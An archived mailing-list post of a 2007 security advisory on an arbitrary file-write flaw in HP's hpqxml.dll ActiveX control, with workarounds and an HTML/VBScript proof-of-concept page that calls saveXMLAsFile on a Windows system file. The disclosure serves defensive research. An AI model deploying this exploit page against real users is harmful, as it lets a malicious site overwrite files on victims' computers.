Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[GOODFELLAS - VULN] hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitar

from [Goodfellas SRT] Network Security [Permanent Link]
Subject: [GOODFELLAS - VULN] hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write.
Date: Wed, 27 Jun 2007 17:27:57 -0300 

:. GOODFELLAS Security Research TEAM  .: 
:. http://goodfellas.shellcode.com.ar .:

hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write 
===================================================

Internal ID: VULWAR200706275.

Introduction

hpqxml.dll is a library included in the HP Photo Digital Imaging 
software package from the HP Company. http://www.hp.com. 
Link:
http://www.hp.com/united-states/consumer/digital_photography/home_f.html


Tested In

- Windows XP SP2 english/french with IE 6.0 / 7.0. 
- Windows vista Professional English/French SP1 with IE 7.0


Summary

The saveXMLAsFile method doesn't check if it is being called from the
application 
or from a malicious user.


Impact

The vulnerability is due to an error in the saveXMLAsFile method that
manipulate 
local files insecurely, which could allow malicious users to write
arbitrary 
data to any file on a vulnerable system. Besides, the method does not
check the 
file headers before writing.


Workaround

- Activate the Kill bit zero in
clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3. 
- Unregister hpqxml.dll using regsvr32.


Timeline

June 27, 2007 -- Bug discovery. 
June 27, 2007 -- Bug published.


Credits

 * Brian Mariani <bmariani@shellcode.com.ar 
 * GoodFellas Security Research Team <goodfellas.shellcode.com.ar>


Technical Detail

saveXMLAsFile method receives a filename as an argument, with this
format "c:\path\file".


Proof of Concept

<html> 
<head> 
<title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data
Write</title> 
</head> 
<body> 
<h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</h3><br>

<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3'
id='target' /></object>

<input language=VBScript onclick=HP() type=button value="Proof of
Concept">

<script language = 'vbscript'>

Sub HP() 

 filename = "C:\NTDETECT_.COM"

 target.saveXMLAsFile filename 

End Sub

</script> 
</body> 
</html>

-- 
Goodfellas SRT <goodfellas@shellcode.com.ar>
Goodfellas Security Research Team
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [GOODFELLAS - VULN] hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write., Goodfellas SRT <=
Previous by Date:  rPSA-2007-0135-1 krb5 krb5-server krb5-services krb5-test krb5-workstation, rPath Update Announcements
Next by Date:  [Full-disclosure] rPSA-2007-0136-1 httpd mod_ssl, rPath Update Announcements
Previous by Thread:  rPSA-2007-0135-1 krb5 krb5-server krb5-services krb5-test krb5-workstation, rPath Update Announcements
Next by Thread:  [Full-disclosure] rPSA-2007-0136-1 httpd mod_ssl, rPath Update Announcements
Indexes:  [Date] [Thread] [Top] [All Lists]